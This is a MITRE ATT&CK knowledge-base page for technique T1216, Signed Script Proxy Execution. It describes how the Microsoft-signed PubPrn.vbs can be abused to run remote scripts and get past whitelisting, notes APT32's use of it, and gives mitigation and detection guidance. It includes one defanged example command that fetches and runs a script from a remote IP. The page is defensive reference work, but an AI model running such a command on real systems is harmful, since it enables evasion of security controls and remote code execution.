Check out the results from our first round of ATT&CK Evaluations at attackevals.mitre.org!

Signed Script Proxy Execution

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

ID: T1216

Tactic: Defense Evasion, Execution

Platform:  Windows

Permissions Required:  User

Data Sources:  Process monitoring, Process command-line parameters

Supports Remote:  No

Defense Bypassed:  Application whitelisting, Digital Certificate Validation

Contributors:  Praetorian

Version: 1.0

Examples

NameDescription
APT32

APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.[3]

Mitigation

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

Detection

Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.

References